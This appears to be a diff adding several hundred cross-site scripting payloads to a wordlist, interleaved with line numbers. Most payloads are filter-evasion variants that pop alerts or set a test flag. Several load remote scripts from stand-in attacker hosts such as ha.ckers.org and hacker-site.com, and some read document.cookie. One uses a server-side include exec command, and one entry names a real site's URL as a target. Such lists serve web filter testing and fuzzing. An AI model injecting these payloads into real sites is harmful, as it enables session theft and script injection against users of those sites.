+ <script>alert(String.fromCharCode(88,83,83))</script>
2102
+ <img src=foo.png onerror=alert(/xssed/) />
2103
+ <style>@im\port'\ja\vasc\ript:alert(\"XSS\")';</style>
2104
+ <? echo('<scr)'; echo('ipt>alert(\"XSS\")</script>'); ?>
2105
+ <marquee><script>alert('XSS')</script></marquee>
2106
+ <IMG SRC=\"jav&#x09;ascript:alert('XSS');\">
2107
+ <IMG SRC=\"jav&#x0A;ascript:alert('XSS');\">
2108
+ <IMG SRC=\"jav&#x0D;ascript:alert('XSS');\">
2109
+ <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
2110
+ "><script>alert(0)</script>
2111
+ <script src=http://yoursite.com/your_files.js></script>
2112
+ </title><script>alert(/xss/)</script>
2113
+ </textarea><script>alert(/xss/)</script>
2114
+ <IMG LOWSRC=\"javascript:alert('XSS')\">
2115
+ <IMG DYNSRC=\"javascript:alert('XSS')\">
2116
+ <font style='color:expression(alert(document.cookie))'>
2117
+ <img src="javascript:alert('XSS')">
2118
+ <script language="JavaScript">alert('XSS')</script>
2119
+ <body onunload="javascript:alert('XSS');">
2120
+ <body onLoad="alert('XSS');"
2121
+ [color=red' onmouseover="alert('xss')"]mouse over[/color]
2122
+ "/></a></><img src=1.gif onerror=alert(1)>
2123
+ window.alert("Bonjour !");
2124
+ <div style="x:expression((window.r==1)?'':eval('r=1;
2125
+ alert(String.fromCharCode(88,83,83));'))">
2126
+ <iframe<?php echo chr(11)?> onload=alert('XSS')></iframe>
2127
+ "><script alert(String.fromCharCode(88,83,83))</script>
2128
+ '>><marquee><h1>XSS</h1></marquee>
2129
+ '">><script>alert('XSS')</script>
2130
+ '">><marquee><h1>XSS</h1></marquee>
2131
+ <META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=javascript:alert('XSS');\">
2132
+ <META HTTP-EQUIV=\"refresh\" CONTENT=\"0; URL=http://;URL=javascript:alert('XSS');\">
2133
+ <script>var var = 1; alert(var)</script>
2134
+ <STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
2135
+ <?='<SCRIPT>alert("XSS")</SCRIPT>'?>
2136
+ <IMG SRC='vbscript:msgbox(\"XSS\")'>
2137
+ " onfocus=alert(document.domain) "> <"
2138
+ <FRAMESET><FRAME SRC=\"javascript:alert('XSS');\"></FRAMESET>
2139
+ <STYLE>li {list-style-image: url(\"javascript:alert('XSS')\");}</STYLE><UL><LI>XSS
2140
+ perl -e 'print \"<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>\";' > out
2141
+ perl -e 'print \"<IMG SRC=java\0script:alert(\"XSS\")>\";' > out
2142
+ <br size=\"&{alert('XSS')}\">
2143
+ <scrscriptipt>alert(1)</scrscriptipt>
2144
+ </br style=a:expression(alert())>
2145
+ </script><script>alert(1)</script>
2146
+ "><BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
2147
+ [color=red width=expression(alert(123))][color]
2148
+ <BASE HREF="javascript:alert('XSS');//">
2149
+ Execute(MsgBox(chr(88)&chr(83)&chr(83)))<
2150
+ "></iframe><script>alert(123)</script>
2151
+ <body onLoad="while(true) alert('XSS');">
2152
+ '"></title><script>alert(1111)</script>
2153
+ </textarea>'"><script>alert(document.cookie)</script>
2154
+ '""><script language="JavaScript"> alert('X \nS \nS');</script>
2155
+ </script></script><<<<script><>>>><<<script>alert(123)</script>
2156
+ <html><noalert><noscript>(123)</noscript><script>(123)</script>
2157
+ <INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
2158
+ '></select><script>alert(123)</script>
2159
+ '>"><script src = 'http://www.site.com/XSS.js'></script>
2160
+ }</style><script>a=eval;b=alert;a(b(/XSS/.source));</script>
2161
+ <SCRIPT>document.write("XSS");</SCRIPT>
2162
+ a="get";b="URL";c="javascript:";d="alert('xss');";eval(a+b+c+d);
2163
+ ='><script>alert("xss")</script>
2164
+ <script+src=">"+src="http://yoursite.com/xss.js?69,69"></script>
2165
+ <body background=javascript:'"><script>alert(navigator.userAgent)</script>></body>
2166
+ ">/XaDoS/><script>alert(document.cookie)</script><script src="http://www.site.com/XSS.js"></script>
2167
+ ">/KinG-InFeT.NeT/><script>alert(document.cookie)</script>
2168
+ src="http://www.site.com/XSS.js"></script>
2169
+ data:text/html;charset=utf-7;base64,Ij48L3RpdGxlPjxzY3JpcHQ+YWxlcnQoMTMzNyk8L3NjcmlwdD4=
2170
+ !--" /><script>alert('xss');</script>
2171
+ <script>alert("XSS by \nxss")</script><marquee><h1>XSS by xss</h1></marquee>
2172
+ "><script>alert("XSS by \nxss")</script>><marquee><h1>XSS by xss</h1></marquee>
2173
+ '"></title><script>alert("XSS by \nxss")</script>><marquee><h1>XSS by xss</h1></marquee>
2174
+ <img """><script>alert("XSS by \nxss")</script><marquee><h1>XSS by xss</h1></marquee>
2175
+ <script>alert(1337)</script><marquee><h1>XSS by xss</h1></marquee>
2176
+ "><script>alert(1337)</script>"><script>alert("XSS by \nxss</h1></marquee>
2177
+ '"></title><script>alert(1337)</script>><marquee><h1>XSS by xss</h1></marquee>
2178
+ <iframe src="javascript:alert('XSS by \nxss');"></iframe><marquee><h1>XSS by xss</h1></marquee>
2179
+ '><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT><img src="" alt='
2180
+ "><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT><img src="" alt="
2181
+ \'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT><img src="" alt=\'
2182
+ http://www.simpatie.ro/index.php?page=friends&member=781339&javafunctionname=Pageclick&javapgno=2 javapgno=2 ??XSS??
2183
+ http://www.simpatie.ro/index.php?page=top_movies&cat=13&p=2 p=2 ??XSS??
2184
+ '); alert('xss'); var x='
2185
+ \\'); alert(\'xss\');var x=\'
2186
+ //--></SCRIPT><SCRIPT>alert(String.fromCharCode(88,83,83));
2187
+ >"><ScRiPt%20%0a%0d>alert(561177485777)%3B</ScRiPt>
2188
+ <img src="Mario Heiderich says that svg SHOULD not be executed trough image tags" onerror="javascript:document.write('\u003c\u0069\u0066\u0072\u0061\u006d\u0065\u0020\u0073\u0072\u0063\u003d\u0022\u0064\u0061\u0074\u0061\u003a\u0069\u006d\u0061\u0067\u0065\u002f\u0073\u0076\u0067\u002b\u0078\u006d\u006c\u003b\u0062\u0061\u0073\u0065\u0036\u0034\u002c\u0050\u0048\u004e\u0032\u005a\u0079\u0042\u0034\u0062\u0057\u0078\u0075\u0063\u007a\u0030\u0069\u0061\u0048\u0052\u0030\u0063\u0044\u006f\u0076\u004c\u0033\u0064\u0033\u0064\u0079\u0035\u0033\u004d\u0079\u0035\u0076\u0063\u006d\u0063\u0076\u004d\u006a\u0041\u0077\u004d\u0043\u0039\u007a\u0064\u006d\u0063\u0069\u0050\u0069\u0041\u0067\u0043\u0069\u0041\u0067\u0049\u0044\u0078\u0070\u0062\u0057\u0046\u006e\u005a\u0053\u0042\u0076\u0062\u006d\u0078\u0076\u0059\u0057\u0051\u0039\u0049\u006d\u0046\u0073\u005a\u0058\u004a\u0030\u004b\u0044\u0045\u0070\u0049\u006a\u0034\u0038\u004c\u0032\u006c\u0074\u0059\u0057\u0064\u006c\u0050\u0069\u0041\u0067\u0043\u0069\u0041\u0067\u0049\u0044\u0078\u007a\u0064\u006d\u0063\u0067\u0062\u0032\u0035\u0073\u0062\u0032\u0046\u006b\u0050\u0053\u004a\u0068\u0062\u0047\u0056\u0079\u0064\u0043\u0067\u0079\u004b\u0053\u0049\u002b\u0050\u0043\u0039\u007a\u0064\u006d\u0063\u002b\u0049\u0043\u0041\u004b\u0049\u0043\u0041\u0067\u0050\u0048\u004e\u006a\u0063\u006d\u006c\u0077\u0064\u0044\u0035\u0068\u0062\u0047\u0056\u0079\u0064\u0043\u0067\u007a\u004b\u0054\u0077\u0076\u0063\u0032\u004e\u0079\u0061\u0058\u0042\u0030\u0050\u0069\u0041\u0067\u0043\u0069\u0041\u0067\u0049\u0044\u0078\u006b\u005a\u0057\u005a\u007a\u0049\u0047\u0039\u0075\u0062\u0047\u0039\u0068\u005a\u0044\u0030\u0069\u0059\u0057\u0078\u006c\u0063\u006e\u0051\u006f\u004e\u0043\u006b\u0069\u0050\u006a\u0077\u0076\u005a\u0047\u0056\u006d\u0063\u007a\u0034\u0067\u0049\u0041\u006f\u0067\u0049\u0043\u0041\u0038\u005a\u0079\u0042\u0076\u0062\u006d\u0078\u0076\u0059\u0057\u0051\u0039\u0049\u006d\u0046\u0073\u005a\u0058\u004a\u0030\u004b\u0044\u0055\u0070\u0049\u006a\u0034\u0067\u0049\u0041\u006f\u0067\u0049\u0043\u0041\u0067\u0049\u0043\u0041\u0067\u0050\u0047\u004e\u0070\u0063\u006d\u004e\u0073\u005a\u0053\u0042\u0076\u0062\u006d\u0078\u0076\u0059\u0057\u0051\u0039\u0049\u006d\u0046\u0073\u005a\u0058\u004a\u0030\u004b\u0044\u0059\u0070\u0049\u0069\u0041\u0076\u0050\u0069\u0041\u0067\u0043\u0069\u0041\u0067\u0049\u0043\u0041\u0067\u0049\u0043\u0041\u0038\u0064\u0047\u0056\u0034\u0064\u0043\u0042\u0076\u0062\u006d\u0078\u0076\u0059\u0057\u0051\u0039\u0049\u006d\u0046\u0073\u005a\u0058\u004a\u0030\u004b\u0044\u0063\u0070\u0049\u006a\u0034\u0038\u004c\u0033\u0052\u006c\u0065\u0048\u0051\u002b\u0049\u0043\u0041\u004b\u0049\u0043\u0041\u0067\u0050\u0043\u0039\u006e\u0050\u0069\u0041\u0067\u0043\u006a\u0077\u0076\u0063\u0033\u005a\u006e\u0050\u0069\u0041\u0067\u0022\u003e\u003c\u002f\u0069\u0066\u0072\u0061\u006d\u0065\u003e');"></img>
2189
+ </body>
2190
+ </html>
2191
+ <SCRIPT SRC=http://hacker-site.com/xss.js></SCRIPT>
2192
+ <SCRIPT> alert(“XSS”); </SCRIPT>
2193
+ <BODY ONLOAD=alert("XSS")>
2194
+ <BODY BACKGROUND="javascript:alert('XSS')">
2195
+ <IMG SRC="javascript:alert('XSS');">
2196
+ <IMG DYNSRC="javascript:alert('XSS')">
2197
+ <IMG LOWSRC="javascript:alert('XSS')">
2198
+ <IFRAME SRC=”http://hacker-site.com/xss.html”>
2199
+ <INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
2200
+ <LINK REL="stylesheet" HREF="javascript:alert('XSS');">
2201
+ <TABLE BACKGROUND="javascript:alert('XSS')">
2202
+ <TD BACKGROUND="javascript:alert('XSS')">
2203
+ <DIV STYLE="background-image: url(javascript:alert('XSS'))">
2204
+ <DIV STYLE="width: expression(alert('XSS'));">
2205
+ <OBJECT TYPE="text/x-scriptlet" DATA="http://hacker.com/xss.html">
2206
+ <EMBED SRC="http://hacker.com/xss.swf" AllowScriptAccess="always">
2207
+ &apos;;alert(String.fromCharCode(88,83,83))//\&apos;;alert(String.fromCharCode(88,83,83))//&quot;;alert(String.fromCharCode(88,83,83))//\&quot;;alert(String.fromCharCode(88,83,83))//--&gt;&lt;/SCRIPT&gt;&quot;&gt;&apos;&gt;&lt;SCRIPT&gt;alert(String.fromCharCode(88,83,83))&lt;/SCRIPT&gt;
2208
+ &apos;&apos;;!--&quot;&lt;XSS&gt;=&amp;{()}
2209
+ &lt;SCRIPT&gt;alert(&apos;XSS&apos;)&lt;/SCRIPT&gt;
2210
+ &lt;SCRIPT SRC=http://ha.ckers.org/xss.js&gt;&lt;/SCRIPT&gt;
2211
+ &lt;SCRIPT&gt;alert(String.fromCharCode(88,83,83))&lt;/SCRIPT&gt;
2212
+ &lt;BASE HREF=&quot;javascript:alert(&apos;XSS&apos;);//&quot;&gt;
2213
+ &lt;BGSOUND SRC=&quot;javascript:alert(&apos;XSS&apos;);&quot;&gt;
2214
+ &lt;BODY BACKGROUND=&quot;javascript:alert(&apos;XSS&apos;);&quot;&gt;
2215
+ &lt;BODY ONLOAD=alert(&apos;XSS&apos;)&gt;
2216
+ &lt;DIV STYLE=&quot;background-image: url(javascript:alert(&apos;XSS&apos;))&quot;&gt;
2217
+ &lt;DIV STYLE=&quot;background-image: url(&amp;#1;javascript:alert(&apos;XSS&apos;))&quot;&gt;
2218
+ &lt;DIV STYLE=&quot;width: expression(alert(&apos;XSS&apos;));&quot;&gt;
2219
+ &lt;FRAMESET&gt;&lt;FRAME SRC=&quot;javascript:alert(&apos;XSS&apos;);&quot;&gt;&lt;/FRAMESET&gt;
2220
+ &lt;IFRAME SRC=&quot;javascript:alert(&apos;XSS&apos;);&quot;&gt;&lt;/IFRAME&gt;
2221
+ &lt;INPUT TYPE=&quot;IMAGE&quot; SRC=&quot;javascript:alert(&apos;XSS&apos;);&quot;&gt;
2222
+ &lt;IMG SRC=&quot;javascript:alert(&apos;XSS&apos;);&quot;&gt;
2223
+ &lt;IMG SRC=javascript:alert(&apos;XSS&apos;)&gt;
2224
+ &lt;IMG DYNSRC=&quot;javascript:alert(&apos;XSS&apos;);&quot;&gt;
2225
+ &lt;IMG LOWSRC=&quot;javascript:alert(&apos;XSS&apos;);&quot;&gt;
2226
+ &lt;IMG SRC=&quot;http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode&quot;&gt;
2227
+ Redirect 302 /a.jpg http://victimsite.com/admin.asp&amp;deleteuser
2228
+ exp/*&lt;XSS STYLE=&apos;no\xss:noxss(&quot;*//*&quot;);
2229
+ &lt;STYLE&gt;li {list-style-image: url(&quot;javascript:alert(&#39;XSS&#39;)&quot;);}&lt;/STYLE&gt;&lt;UL&gt;&lt;LI&gt;XSS
2230
+ &lt;IMG SRC=&apos;vbscript:msgbox(&quot;XSS&quot;)&apos;&gt;
2231
+ &lt;LAYER SRC=&quot;http://ha.ckers.org/scriptlet.html&quot;&gt;&lt;/LAYER&gt;
2232
+ &lt;IMG SRC=&quot;livescript:[code]&quot;&gt;
2233
+ %BCscript%BEalert(%A2XSS%A2)%BC/script%BE
2234
+ &lt;META HTTP-EQUIV=&quot;refresh&quot; CONTENT=&quot;0;url=javascript:alert(&apos;XSS&apos;);&quot;&gt;
2235
+ &lt;META HTTP-EQUIV=&quot;refresh&quot; CONTENT=&quot;0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K&quot;&gt;
2236
+ &lt;META HTTP-EQUIV=&quot;refresh&quot; CONTENT=&quot;0; URL=http://;URL=javascript:alert(&apos;XSS&apos;);&quot;&gt;
2237
+ &lt;IMG SRC=&quot;mocha:[code]&quot;&gt;
2238
+ &lt;OBJECT TYPE=&quot;text/x-scriptlet&quot; DATA=&quot;http://ha.ckers.org/scriptlet.html&quot;&gt;&lt;/OBJECT&gt;
2239
+ &lt;OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389&gt;&lt;param name=url value=javascript:alert(&apos;XSS&apos;)&gt;&lt;/OBJECT&gt;
2240
+ &lt;EMBED SRC=&quot;http://ha.ckers.org/xss.swf&quot; AllowScriptAccess=&quot;always&quot;&gt;&lt;/EMBED&gt;
2241
+ a=&quot;get&quot;;&amp;#10;b=&quot;URL(&quot;&quot;;&amp;#10;c=&quot;javascript:&quot;;&amp;#10;d=&quot;alert(&apos;XSS&apos;);&quot;)&quot;;&#10;eval(a+b+c+d);
2242
+ &lt;STYLE TYPE=&quot;text/javascript&quot;&gt;alert(&apos;XSS&apos;);&lt;/STYLE&gt;
2243
+ &lt;IMG STYLE=&quot;xss:expr/*XSS*/ession(alert(&apos;XSS&apos;))&quot;&gt;
2244
+ &lt;XSS STYLE=&quot;xss:expression(alert(&apos;XSS&apos;))&quot;&gt;
2245
+ &lt;STYLE&gt;.XSS{background-image:url(&quot;javascript:alert(&apos;XSS&apos;)&quot;);}&lt;/STYLE&gt;&lt;A CLASS=XSS&gt;&lt;/A&gt;
2246
+ &lt;STYLE type=&quot;text/css&quot;&gt;BODY{background:url(&quot;javascript:alert(&apos;XSS&apos;)&quot;)}&lt;/STYLE&gt;
2247
+ &lt;LINK REL=&quot;stylesheet&quot; HREF=&quot;javascript:alert(&apos;XSS&apos;);&quot;&gt;
2248
+ &lt;LINK REL=&quot;stylesheet&quot; HREF=&quot;http://ha.ckers.org/xss.css&quot;&gt;
2249
+ &lt;STYLE&gt;@import&apos;http://ha.ckers.org/xss.css&apos;;&lt;/STYLE&gt;
2250
+ &lt;META HTTP-EQUIV=&quot;Link&quot; Content=&quot;&lt;http://ha.ckers.org/xss.css&gt;; REL=stylesheet&quot;&gt;
2251
+ &lt;STYLE&gt;BODY{-moz-binding:url(&quot;http://ha.ckers.org/xssmoz.xml#xss&quot;)}&lt;/STYLE&gt;
2252
+ &lt;TABLE BACKGROUND=&quot;javascript:alert(&apos;XSS&apos;)&quot;&gt;&lt;/TABLE&gt;
2253
+ &lt;TABLE&gt;&lt;TD BACKGROUND=&quot;javascript:alert(&apos;XSS&apos;)&quot;&gt;&lt;/TD&gt;&lt;/TABLE&gt;
2254
+ &lt;HTML xmlns:xss&gt;
2255
+ &lt;XML ID=I&gt;&lt;X&gt;&lt;C&gt;&lt;![CDATA[&lt;IMG SRC=&quot;javas]]&gt;&lt;![CDATA[cript:alert(&apos;XSS&apos;);&quot;&gt;]]&gt;
2256
+ &lt;XML ID=&quot;xss&quot;&gt;&lt;I&gt;&lt;B&gt;&lt;IMG SRC=&quot;javas&lt;!-- --&gt;cript:alert(&apos;XSS&apos;)&quot;&gt;&lt;/B&gt;&lt;/I&gt;&lt;/XML&gt;
2257
+ &lt;XML SRC=&quot;http://ha.ckers.org/xsstest.xml&quot; ID=I&gt;&lt;/XML&gt;
2258
+ &lt;HTML&gt;&lt;BODY&gt;
2259
+ &lt;!--[if gte IE 4]&gt;
2260
+ &lt;META HTTP-EQUIV=&quot;Set-Cookie&quot; Content=&quot;USERID=&lt;SCRIPT&gt;alert(&apos;XSS&apos;)&lt;/SCRIPT&gt;&quot;&gt;
2261
+ &lt;XSS STYLE=&quot;behavior: url(http://ha.ckers.org/xss.htc);&quot;&gt;
2262
+ &lt;SCRIPT SRC=&quot;http://ha.ckers.org/xss.jpg&quot;&gt;&lt;/SCRIPT&gt;
2263
+ &lt;!--#exec cmd=&quot;/bin/echo &apos;&lt;SCRIPT SRC&apos;&quot;--&gt;&lt;!--#exec cmd=&quot;/bin/echo &apos;=http://ha.ckers.org/xss.js&gt;&lt;/SCRIPT&gt;&apos;&quot;--&gt;
2264
+ &lt;? echo(&apos;&lt;SCR)&apos;;
2265
+ &lt;BR SIZE=&quot;&amp;{alert(&apos;XSS&apos;)}&quot;&gt;
2266
+ &lt;IMG SRC=JaVaScRiPt:alert(&apos;XSS&apos;)&gt;
2267
+ &lt;IMG SRC=javascript:alert(&amp;quot;XSS&amp;quot;)&gt;
2268
+ &lt;IMG SRC=`javascript:alert(&quot;RSnake says, &apos;XSS&apos;&quot;)`&gt;
2269
+ &lt;IMG SRC=javascript:alert(String.fromCharCode(88,83,83))&gt;
2270
+ &lt;IMG SRC=&amp;#106;&amp;#97;&amp;#118;&amp;#97;&amp;#115;&amp;#99;&amp;#114;&amp;#105;&amp;#112;&amp;#116;&amp;#58;&amp;#97;&amp;#108;&amp;#101;&amp;#114;&amp;#116;&amp;#40;&amp;#39;&amp;#88;&amp;#83;&amp;#83;&amp;#39;&amp;#41;&gt;
2271
+ &lt;IMG SRC=&amp;#0000106&amp;#0000097&amp;#0000118&amp;#0000097&amp;#0000115&amp;#0000099&amp;#0000114&amp;#0000105&amp;#0000112&amp;#0000116&amp;#0000058&amp;#0000097&amp;#0000108&amp;#0000101&amp;#0000114&amp;#0000116&amp;#0000040&amp;#0000039&amp;#0000088&amp;#0000083&amp;#0000083&amp;#0000039&amp;#0000041&gt;
2272
+ &lt;DIV STYLE=&quot;background-image:\0075\0072\006C\0028&apos;\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029&apos;\0029&quot;&gt;
2273
+ &lt;IMG SRC=&amp;#x6A&amp;#x61&amp;#x76&amp;#x61&amp;#x73&amp;#x63&amp;#x72&amp;#x69&amp;#x70&amp;#x74&amp;#x3A&amp;#x61&amp;#x6C&amp;#x65&amp;#x72&amp;#x74&amp;#x28&amp;#x27&amp;#x58&amp;#x53&amp;#x53&amp;#x27&amp;#x29&gt;
2274
+ &lt;HEAD&gt;&lt;META HTTP-EQUIV=&quot;CONTENT-TYPE&quot; CONTENT=&quot;text/html; charset=UTF-7&quot;&gt; &lt;/HEAD&gt;+ADw-SCRIPT+AD4-alert(&apos;XSS&apos;);+ADw-/SCRIPT+AD4-
2275
+ \&quot;;alert(&apos;XSS&apos;);//
2276
+ &lt;/TITLE&gt;&lt;SCRIPT&gt;alert("XSS");&lt;/SCRIPT&gt;
2277
+ &lt;STYLE&gt;@im\port&apos;\ja\vasc\ript:alert(&quot;XSS&quot;)&apos;;&lt;/STYLE&gt;
2278
+ &lt;IMG SRC=&quot;jav&#x09;ascript:alert(&apos;XSS&apos;);&quot;&gt;
2279
+ &lt;IMG SRC=&quot;jav&amp;#x09;ascript:alert(&apos;XSS&apos;);&quot;&gt;
2280
+ &lt;IMG SRC=&quot;jav&amp;#x0A;ascript:alert(&apos;XSS&apos;);&quot;&gt;
2281
+ &lt;IMG SRC=&quot;jav&amp;#x0D;ascript:alert(&apos;XSS&apos;);&quot;&gt;
2282
+ &lt;IMG&#x0D;SRC&#x0D;=&#x0D;&quot;&#x0D;j&#x0D;a&#x0D;v&#x0D;a&#x0D;s&#x0D;c&#x0D;r&#x0D;i&#x0D;p&#x0D;t&#x0D;:&#x0D;a&#x0D;l&#x0D;e&#x0D;r&#x0D;t&#x0D;(&#x0D;&apos;&#x0D;X&#x0D;S&#x0D;S&#x0D;&apos;&#x0D;)&#x0D;&quot;&#x0D;&gt;&#x0D;
2283
+ perl -e &apos;print &quot;&lt;IMG SRC=java\0script:alert(&quot;XSS&quot;)>&quot;;&apos;&gt; out
2284
+ perl -e &apos;print &quot;&amp;&lt;SCR\0IPT&gt;alert(&quot;XSS&quot;)&lt;/SCR\0IPT&gt;&quot;;&apos; &gt; out
2285
+ &lt;IMG SRC=&quot; &amp;#14; javascript:alert(&apos;XSS&apos;);&quot;&gt;
2286
+ &lt;SCRIPT/XSS SRC=&quot;http://ha.ckers.org/xss.js&quot;&gt;&lt;/SCRIPT&gt;
2287
+ &lt;BODY onload!#$%&amp;()*~+-_.,:;?@[/|\]^`=alert(&quot;XSS&quot;)&gt;
2288
+ &lt;SCRIPT SRC=http://ha.ckers.org/xss.js
2289
+ &lt;SCRIPT SRC=//ha.ckers.org/.j&gt;
2290
+ &lt;IMG SRC=&quot;javascript:alert(&apos;XSS&apos;)&quot;
2291
+ &lt;IFRAME SRC=http://ha.ckers.org/scriptlet.html &lt;
2292
+ &lt;&lt;SCRIPT&gt;alert(&quot;XSS&quot;);//&lt;&lt;/SCRIPT&gt;
2293
+ &lt;IMG &quot;&quot;&quot;&gt;&lt;SCRIPT&gt;alert(&quot;XSS&quot;)&lt;/SCRIPT&gt;&quot;&gt;
2294
+ &lt;SCRIPT&gt;a=/XSS/
2295
+ &lt;SCRIPT a=&quot;&gt;&quot; SRC=&quot;http://ha.ckers.org/xss.js&quot;&gt;&lt;/SCRIPT&gt;
2296
+ &lt;SCRIPT =&quot;blah&quot; SRC=&quot;http://ha.ckers.org/xss.js&quot;&gt;&lt;/SCRIPT&gt;
2297
+ &lt;SCRIPT a=&quot;blah&quot; &apos;&apos; SRC=&quot;http://ha.ckers.org/xss.js&quot;&gt;&lt;/SCRIPT&gt;
2298
+ &lt;SCRIPT &quot;a=&apos;&gt;&apos;&quot; SRC=&quot;http://ha.ckers.org/xss.js&quot;&gt;&lt;/SCRIPT&gt;
2299
+ &lt;SCRIPT a=`&gt;` SRC=&quot;http://ha.ckers.org/xss.js&quot;&gt;&lt;/SCRIPT&gt;
2300
+ &lt;SCRIPT&gt;document.write(&quot;&lt;SCRI&quot;);&lt;/SCRIPT&gt;PT SRC=&quot;http://ha.ckers.org/xss.js&quot;&gt;&lt;/SCRIPT&gt;
2301
+ &lt;SCRIPT a=&quot;>&apos;>&quot; SRC=&quot;http://ha.ckers.org/xss.js&quot;&gt;&lt;/SCRIPT&gt;
2302
+ &lt;A HREF=&quot;http://66.102.7.147/&quot;&gt;XSS&lt;/A&gt;
2303
+ &lt;A HREF=&quot;http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D&quot;&gt;XSS&lt;/A&gt;
2304
+ &lt;A HREF=&quot;http://1113982867/&quot;&gt;XSS&lt;/A&gt;
2305
+ &lt;A HREF=&quot;http://0x42.0x0000066.0x7.0x93/&quot;&gt;XSS&lt;/A&gt;
2306
+ &lt;A HREF=&quot;http://0102.0146.0007.00000223/&quot;&gt;XSS&lt;/A&gt;
2307
+ &lt;A HREF=&quot;h&#x0A;tt&#09;p://6&amp;#09;6.000146.0x7.147/&quot;&gt;XSS&lt;/A&gt;
2308
+ &lt;A HREF=&quot;//www.google.com/&quot;&gt;XSS&lt;/A&gt;
2309
+ &lt;A HREF=&quot;//google&quot;&gt;XSS&lt;/A&gt;
2310
+ &lt;A HREF=&quot;http://ha.ckers.org@google&quot;&gt;XSS&lt;/A&gt;
2311
+ &lt;A HREF=&quot;http://google:ha.ckers.org&quot;&gt;XSS&lt;/A&gt;
2312
+ &lt;A HREF=&quot;http://google.com/&quot;&gt;XSS&lt;/A&gt;
2313
+ &lt;A HREF=&quot;http://www.google.com./&quot;&gt;XSS&lt;/A&gt;
2314
+ &lt;A HREF=&quot;javascript:document.location=&apos;http://www.google.com/&apos;&quot;&gt;XSS&lt;/A&gt;
2315
+ &lt;A HREF=&quot;http://www.gohttp://www.google.com/ogle.com/&quot;&gt;XSS&lt;/A&gt;
2316
+ <script>document.vulnerable=true;</script>
2317
+ <img SRC="jav ascript:document.vulnerable=true;">
2318
+ <img SRC="javascript:document.vulnerable=true;">
2319
+ <img SRC=" &#14; javascript:document.vulnerable=true;">
2320
+ <body onload!#$%&()*~+-_.,:;?@[/|\]^`=document.vulnerable=true;>
2321
+ <<SCRIPT>document.vulnerable=true;//<</SCRIPT>
2322
+ <script <B>document.vulnerable=true;</script>
2323
+ <img SRC="javascript:document.vulnerable=true;"
2324
+ <iframe src="javascript:document.vulnerable=true; <
2325
+ <script>a=/XSS/\ndocument.vulnerable=true;</script>
2326
+ \";document.vulnerable=true;;//
2327
+ </title><SCRIPT>document.vulnerable=true;</script>
2328
+ <input TYPE="IMAGE" SRC="javascript:document.vulnerable=true;">
2329
+ <body BACKGROUND="javascript:document.vulnerable=true;">
2330
+ <body ONLOAD=document.vulnerable=true;>
2331
+ <img DYNSRC="javascript:document.vulnerable=true;">
2332
+ <img LOWSRC="javascript:document.vulnerable=true;">
2333
+ <bgsound SRC="javascript:document.vulnerable=true;">
2334
+ <br SIZE="&{document.vulnerable=true}">
2335
+ <LAYER SRC="javascript:document.vulnerable=true;"></LAYER>
2336
+ <link REL="stylesheet" HREF="javascript:document.vulnerable=true;">
2337
+ <style>li {list-style-image: url("javascript:document.vulnerable=true;");</STYLE><UL><LI>XSS
2338
+ <img SRC='vbscript:document.vulnerable=true;'>
2339
+ 1script3document.vulnerable=true;1/script3
2340
+ <meta HTTP-EQUIV="refresh" CONTENT="0;url=javascript:document.vulnerable=true;">
2341
+ <meta HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:document.vulnerable=true;">
2342
+ <IFRAME SRC="javascript:document.vulnerable=true;"></iframe>
2343
+ <FRAMESET><FRAME SRC="javascript:document.vulnerable=true;"></frameset>
2344
+ <table BACKGROUND="javascript:document.vulnerable=true;">
2345
+ <table><TD BACKGROUND="javascript:document.vulnerable=true;">
2346
+ <div STYLE="background-image: url(javascript:document.vulnerable=true;)">
2347
+ <div STYLE="background-image: url(&#1;javascript:document.vulnerable=true;)">
2348
+ <div STYLE="width: expression(document.vulnerable=true);">
2349
+ <style>@im\port'\ja\vasc\ript:document.vulnerable=true';</style>
2350
+ <img STYLE="xss:expr/*XSS*/ession(document.vulnerable=true)">
2351
+ <XSS STYLE="xss:expression(document.vulnerable=true)">
2352
+ exp/*<A STYLE='no\xss:noxss("*//*");xss:ex/*XSS*//*/*/pression(document.vulnerable=true)'>
2353
+ <style TYPE="text/javascript">document.vulnerable=true;</style>
2354
+ <style>.XSS{background-image:url("javascript:document.vulnerable=true");}</STYLE><A CLASS=XSS></a>
2355
+ <style type="text/css">BODY{background:url("javascript:document.vulnerable=true")}</style>
2356
+ <!--[if gte IE 4]><SCRIPT>document.vulnerable=true;</SCRIPT><![endif]-->
2357
+ <base HREF="javascript:document.vulnerable=true;//">
2358
+ <OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:document.vulnerable=true></object>
2359
+ <XML ID=I><X><C><![<IMG SRC="javas]]<![cript:document.vulnerable=true;">]]</C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></span>
2360
+ <XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:document.vulnerable=true"></B></I></XML><SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></span>
2361
+ <html><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="XSS<SCRIPT DEFER>document.vulnerable=true</SCRIPT>"></BODY></html>
2362
+ <? echo('<SCR)';echo('IPT>document.vulnerable=true</SCRIPT>'); ?>
2363
+ <meta HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>document.vulnerable=true</SCRIPT>">
2364
